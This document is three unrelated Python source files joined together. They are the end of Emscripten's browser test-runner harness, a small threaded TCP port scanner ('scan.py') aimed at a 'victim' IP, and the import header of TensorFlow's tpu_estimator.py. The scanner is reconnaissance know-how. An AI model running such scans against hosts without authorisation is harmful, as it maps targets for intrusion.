self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(open(path_from_root('tests', 'browser_harness.html'), 'rb').read())
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url)
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
def log_request(code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super(BrowserCore, self).__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a scalar, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super(BrowserCore, cls).setUpClass()
cls.also_asmjs = int(os.getenv('EMTEST_BROWSER_ALSO_ASMJS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser():
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super(BrowserCore, cls).tearDownClass()
if not has_browser():
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param tries_left: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, tries_left=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
asbytes('http://localhost:%s/%s' % (self.port, html_file)),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
try:
self.assertIdentical(expectedResult, output)
except Exception as e:
if tries_left > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, tries_left - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
def with_report_result(self, user_code):
return '''
#define EMTEST_PORT_NUMBER %(port)d
#include "%(report_header)s"
%(report_main)s
%(user_code)s
''' % {
'port': self.port,
'report_header': path_from_root('tests', 'report_result.h'),
'report_main': open(path_from_root('tests', 'report_result.cpp')).read(),
'user_code': user_code
}
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
with open(os.path.join(self.get_dir(), 'reftest.js'), 'w') as out:
with open(path_from_root('tests', 'browser_reporting.js')) as reporting:
out.write('''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
window.requestAnimationFrame = /** @suppress{checkTypes} */ (function(func) {
realRAF(function() {
func();
realRAF(doReftest);
});
});
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
''' % (reporting.read(), basename, int(manually_trigger)))
def compile_btest(self, args):
run_process([PYTHON, EMCC] + args + ['--pre-js', path_from_root('tests', 'browser_reporting.js')])
def btest(self, filename, expected=None, reference=None, force_c=False,
reference_slack=0, manual_reference=False, post_build=None,
args=[], outfile='test.html', message='.', also_proxied=False,
url_suffix='', timeout=None, also_asmjs=False,
manually_trigger_reftest=False):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
# if we are provided the source and not a path, use that
filename_is_src = '\n' in filename
src = filename if filename_is_src else ''
original_args = args[:]
if 'USE_PTHREADS=1' in args and self.is_wasm_backend():
# wasm2js does not support threads yet
also_asmjs = False
if 'WASM=0' not in args:
# Filter out separate-asm, which is implied by wasm
args = [a for a in args if a != '--separate-asm']
# add in support for reporting results. this adds as an include a header so testcases can
# use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
# contains the implementation of REPORT_RESULT (we can't just include that implementation in
# the header as there may be multiple files being compiled here).
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'-include', path_from_root('tests', 'report_result.h'),
path_from_root('tests', 'report_result.cpp')]
if filename_is_src:
filepath = os.path.join(self.get_dir(), 'main.c' if force_c else 'main.cpp')
with open(filepath, 'w') as f:
f.write(src)
else:
filepath = path_from_root('tests', filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(path_from_root('tests', reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args = args + ['--pre-js', 'reftest.js', '-s', 'GL_TESTING=1']
all_args = ['-s', 'IN_TEST_HARNESS=1', filepath, '-o', outfile] + args
# print('all args:', all_args)
try_delete(outfile)
self.compile_btest(all_args)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in args and (also_asmjs or self.also_asmjs):
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['-s', 'WASM=0'], outfile, message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-s', 'GL_TESTING=1'], outfile, message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure=['sh', './configure'],
configure_args=[],
make=['make'],
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False,
cflags=[]):
"""Build a library into a .bc file. We build the .bc file once and cache it
for all our tests. (We cache in memory since the test directory is destroyed
and recreated for each test. Note that we cache separately for different
compilers). This cache is just during the test runner. There is a different
concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = path_from_root('tests', name.replace('_native', ''))
temp_dir = build_dir
project_dir = os.path.join(temp_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
shutil.copytree(source_dir, project_dir) # Useful in debugging sometimes to comment this out, and two lines above
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
env = Building.get_building_env(native, True, cflags=cflags)
for k, v in env_init.items():
env[k] = v
if configure:
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EM_BUILD_VERBOSE < 2 else None
stderr = err if EM_BUILD_VERBOSE < 1 else None
Building.configure(configure + configure_args, env=env,
stdout=stdout,
stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
with open(os.path.join(project_dir, 'configure_out')) as f:
print('-- configure stdout --')
print(f.read())
print('-- end configure stdout --')
with open(os.path.join(project_dir, 'configure_err')) as f:
print('-- configure stderr --')
print(f.read())
print('-- end configure stderr --')
raise
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
Building.make(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
print('-- end stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, open(f, 'rb').read()))
return generated_libs
def check_js_engines():
working_engines = list(filter(jsrun.check_engine, shared.JS_ENGINES))
if len(working_engines) < len(shared.JS_ENGINES):
print('Not all the JS engines in JS_ENGINES appears to work.')
exit(1)
if EMTEST_ALL_ENGINES:
print('(using ALL js engines)')
else:
logger.warning('use EMTEST_ALL_ENGINES=1 in the env to run against all JS '
'engines, which is slower but provides more coverage')
def get_and_import_modules():
modules = []
for filename in glob.glob(os.path.join(os.path.dirname(__file__), 'test*.py')):
module_dir, module_file = os.path.split(filename)
module_name, module_ext = os.path.splitext(module_file)
__import__(module_name)
modules.append(sys.modules[module_name])
return modules
def get_all_tests(modules):
# Create a list of all known tests so that we can choose from them based on a wildcard search
all_tests = []
suites = core_test_modes + non_core_test_modes
for m in modules:
for s in suites:
if hasattr(m, s):
tests = [t for t in dir(getattr(m, s)) if t.startswith('test_')]
all_tests += [s + '.' + t for t in tests]
return all_tests
def tests_with_expanded_wildcards(args, all_tests):
# Process wildcards, e.g. "browser.test_pthread_*" should expand to list all pthread tests
new_args = []
for i, arg in enumerate(args):
if '*' in arg:
if arg.startswith('skip:'):
arg = arg[5:]
matching_tests = fnmatch.filter(all_tests, arg)
new_args += ['skip:' + t for t in matching_tests]
else:
new_args += fnmatch.filter(all_tests, arg)
else:
new_args += [arg]
if not new_args and args:
print('No tests found to run in set: ' + str(args))
sys.exit(1)
return new_args
def skip_requested_tests(args, modules):
for i, arg in enumerate(args):
if arg.startswith('skip:'):
which = [arg.split('skip:')[1]]
print(','.join(which), file=sys.stderr)
for test in which:
print('will skip "%s"' % test, file=sys.stderr)
suite_name, test_name = test.split('.')
for m in modules:
try:
suite = getattr(m, suite_name)
setattr(suite, test_name, lambda s: s.skipTest("requested to be skipped"))
break
except AttributeError:
pass
args[i] = None
return [a for a in args if a is not None]
def args_for_random_tests(args, modules):
if not args:
return args
first = args[0]
if first.startswith('random'):
random_arg = first[6:]
num_tests, base_module, relevant_modes = get_random_test_parameters(random_arg)
for m in modules:
if hasattr(m, base_module):
base = getattr(m, base_module)
new_args = choose_random_tests(base, num_tests, relevant_modes)
print_random_test_statistics(num_tests)
return new_args
return args
def get_random_test_parameters(arg):
num_tests = 1
base_module = default_core_test_mode
relevant_modes = core_test_modes
if len(arg):
num_str = arg
if arg.startswith('other'):
base_module = 'other'
relevant_modes = ['other']
num_str = arg.replace('other', '')
elif arg.startswith('browser'):
base_module = 'browser'
relevant_modes = ['browser']
num_str = arg.replace('browser', '')
num_tests = int(num_str)
return num_tests, base_module, relevant_modes
def choose_random_tests(base, num_tests, relevant_modes):
tests = [t for t in dir(base) if t.startswith('test_')]
print()
chosen = set()
while len(chosen) < num_tests:
test = random.choice(tests)
mode = random.choice(relevant_modes)
new_test = mode + '.' + test
before = len(chosen)
chosen.add(new_test)
if len(chosen) > before:
print('* ' + new_test)
else:
# we may have hit the limit
if len(chosen) == len(tests) * len(relevant_modes):
print('(all possible tests chosen! %d = %d*%d)' % (len(chosen), len(tests), len(relevant_modes)))
break
return list(chosen)
def print_random_test_statistics(num_tests):
std = 0.5 / math.sqrt(num_tests)
expected = 100.0 * (1.0 - std)
print()
print('running those %d randomly-selected tests. if they all pass, then there is a '
'greater than 95%% chance that at least %.2f%% of the test suite will pass'
% (num_tests, expected))
print()
def show():
print('if all tests passed then there is a greater than 95%% chance that at least '
'%.2f%% of the test suite will pass'
% (expected))
atexit.register(show)
def load_test_suites(args, modules):
loader = unittest.TestLoader()
unmatched_test_names = set(args)
suites = []
for m in modules:
names_in_module = []
for name in list(unmatched_test_names):
try:
operator.attrgetter(name)(m)
names_in_module.append(name)
unmatched_test_names.remove(name)
except AttributeError:
pass
if len(names_in_module):
loaded_tests = loader.loadTestsFromNames(sorted(names_in_module), m)
tests = flattened_tests(loaded_tests)
suite = suite_for_module(m, tests)
for test in tests:
suite.addTest(test)
suites.append((m.__name__, suite))
return suites, unmatched_test_names
def flattened_tests(loaded_tests):
tests = []
for subsuite in loaded_tests:
for test in subsuite:
tests.append(test)
return tests
def suite_for_module(module, tests):
suite_supported = module.__name__ in ('test_core', 'test_other')
has_multiple_tests = len(tests) > 1
has_multiple_cores = parallel_runner.num_cores() > 1
if suite_supported and has_multiple_tests and has_multiple_cores:
return parallel_runner.ParallelTestSuite()
return unittest.TestSuite()
def run_tests(options, suites):
resultMessages = []
num_failures = 0
print('Test suites:')
print([s[0] for s in suites])
# Run the discovered tests
testRunner = unittest.TextTestRunner(verbosity=2)
for mod_name, suite in suites:
print('Running %s: (%s tests)' % (mod_name, suite.countTestCases()))
res = testRunner.run(suite)
msg = ('%s: %s run, %s errors, %s failures, %s skipped' %
(mod_name, res.testsRun, len(res.errors), len(res.failures), len(res.skipped)))
num_failures += len(res.errors) + len(res.failures)
resultMessages.append(msg)
if len(resultMessages) > 1:
print('====================')
print()
print('TEST SUMMARY')
for msg in resultMessages:
print(' ' + msg)
# Return the number of failures as the process exit code for automating success/failure reporting.
return min(num_failures, 255)
def parse_args(args):
parser = argparse.ArgumentParser(prog='runner.py', description=__doc__)
parser.add_argument('tests', nargs='*')
return parser.parse_args()
def main(args):
options = parse_args(args)
check_js_engines()
def prepend_default(arg):
if arg.startswith('test_'):
return default_core_test_mode + '.' + arg
return arg
tests = [prepend_default(t) for t in options.tests]
modules = get_and_import_modules()
all_tests = get_all_tests(modules)
tests = tests_with_expanded_wildcards(tests, all_tests)
tests = skip_requested_tests(tests, modules)
tests = args_for_random_tests(tests, modules)
suites, unmatched_tests = load_test_suites(tests, modules)
if unmatched_tests:
print('ERROR: could not find the following tests: ' + ' '.join(unmatched_tests))
return 1
return run_tests(options, suites)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv))
except KeyboardInterrupt:
logger.warning('KeyboardInterrupt')
sys.exit(1)
|
scan.py
|
# Modules
import socket,time,threading,sys
from optparse import OptionParser
# Usage text
usage_text = """
Usage: scan.py [kwargs]
ARGUMENTS (kwargs):
REQUIRED:
------------------------------------------------
--ip:
The IP of the 'victim'.
------------------------------------------------
OPTIONAL (One of these is needed):
------------------------------------------------
-p or --portscan [port limit]:
Just a simple scan up until the given port number.
------------------------------------------------
-w or --wp:
Scan through all of the well known ports.
If used in GUI, leave the port input blank.
------------------------------------------------
-s or --specificport [port]:
Scans a specific port.
------------------------------------------------
-f or --file [filename]:
Write scan reports to a file.
------------------------------------------------
HELP:
-h or --help:
"""
# Usage
def usage():
print(usage_text)
sys.exit()
#Setting up the options for the terminal
parser = OptionParser()
parser.set_conflict_handler("resolve")
parser.add_option("-h", "--help", dest="help", action="store_true")
parser.add_option("--ip", dest="IP")
parser.add_option("-p", "--portscan", dest="port_scan")
parser.add_option("-w", "--wp", dest="known_ports", action="store_true")
parser.add_option("-s", "--specificport", dest="specific_port")
parser.add_option("-f","--file", dest="fileName")
(options, args) = parser.parse_args()
# Main class
class Scanner():
def __init__(self):
self.options = options.__dict__
self.IP = str(options.IP)
self.openPorts = []
self.methodCount = []
self.trues = []
self.methods = ["port_scan", "known_ports", "specific_port"]
self.wellKnownports = [20, 21, 22, 23, 25, 53, 67, 68, 80, 88, 101, 110, 111, 113, 115, 119, 135, 137, 138, 139, 143, 161, 194,
443, 445, 464, 512, 513, 531, 548, 626, 660, 687, 749, 751, 752, 873, 989, 990, 992, 993, 995, 1080, 1243, 1433, 1434,
1723, 1985, 2432, 2336, 3306, 3307, 3283, 3389, 5900, 8080, 9050, 9051, 9010, 33568, 40421, 60008]
self.outputText = []
# Updating info
def update_screen(self):
if __name__ == "__main__":
print(self.outputText[-1])
else:
pass
# Making threads
def make_thread(self,target,**kwargs):
thread = threading.Thread(target=target, args=(kwargs["ip"], kwargs["port"],))
thread.daemon = True
thread.start()
time.sleep(0.01)
# Method for executing functions
def LoopAndThread(self, ip):
# Check args
for i in self.options:
if (i in self.methods) and (self.options[i] is not None):
self.trues.append(i)
if len(self.trues) > 1:
print("Illegal amount of arguments")
usage()
# Loop and execute
self.startTime = time.time()
self.outputText.append(f"\nStart time of scan: {time.ctime()}\nHost: {ip}\n\nPORT STATE\n")
self.update_screen()
for i in self.options:
# Port scanning
if (i == "port_scan") and (self.options["port_scan"] is not None):
self.options[i] = int(self.options[i])
self.options[i] += 1
for port in range(int(self.options[i])):
self.make_thread(self.portScan,ip=ip,port=port)
self.openPorts = sorted(set(self.openPorts))
for i in self.openPorts:
self.outputText.append(f"{i} open")
self.update_screen()
self.outputText.append(f"\nScan is done: {ip} scanned in {(time.time() - self.startTime):.3} seconds")
self.update_screen()
# Well known port scanner
elif (i == "known_ports") and (self.options["known_ports"] is True):
for port in self.wellKnownports:
self.make_thread(self.wellKnownPortScan, ip=ip, port=port)
self.openPorts = sorted(set(self.openPorts))
for i in self.openPorts:
self.outputText.append(f"{i} open")
self.update_screen()
self.outputText.append(f"\nScan is done: {ip} scanned in {(time.time() - self.startTime):.3} seconds")
self.update_screen()
# Specific port scan
elif (i == "specific_port") and (self.options["specific_port"] is not None):
for l in range(3):
self.make_thread(self.SpecificPortScan, ip=ip,port=int(self.options[i]),)
self.openPorts = sorted(set(self.openPorts))
for i in self.openPorts:
self.outputText.append(f"{i} open")
self.update_screen()
if len(self.openPorts) == 0:
self.outputText.append(f"{self.options[i]} closed")
self.update_screen()
self.outputText.append(f"\nScan is done: {ip} scanned in {(time.time() - self.startTime):.3} seconds")
self.update_screen()
# Writing to file if needed
if options.fileName:
f = open(str(options.fileName), "a")
f.write(self.outputText)
# Simple port scan method
def portScan(self, ip ,port):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.result = self.sock.connect_ex((ip, port))
if self.result == 0:
if port in self.openPorts:
pass
else:
self.openPorts.append(port)
else:
pass
# Well known port scan
def wellKnownPortScan(self, ip, port):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.result = self.sock.connect_ex((ip, port))
if self.result == 0:
self.openPorts.append(port)
else:
pass
#Specific Port scan
def SpecificPortScan(self, ip, port):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.result = self.sock.connect_ex((ip, port))
if self.result == 0:
self.openPorts.append(port)
# On-start
if __name__ == "__main__":
#Checking for needed arguments
if options.help:
usage()
if options.IP is None:
usage()
if (options.port_scan is None) and (options.known_ports is None) and (options.specific_port is None):
usage()
# Starting class
Scanning = Scanner()
Scanning.LoopAndThread(Scanning.IP)
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import enum
import math
import os
import signal
import sys
import threading
import time
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import batch_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import estimator_export
from tensorflow_estimator.python.estimator import estimator as estimator_lib
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_output as export_output_lib
from tensorflow_estimator.python.estimator.tpu import _tpu_estimator_embedding
from tensorflow_estimator.python.estimator.tpu import error_handling
from tensorflow_estimator.python.estimator.tpu import iteration_count_estimator
from tensorflow_estimator.python.estimator.tpu import tpu_config
from tensorflow_estimator.python.estimator.tpu import tpu_context
from tensorflow_estimator.python.estimator.tpu import util as util_lib
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_INFERENCE_ON_TPU_MODE = '_inference_on_tpu'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
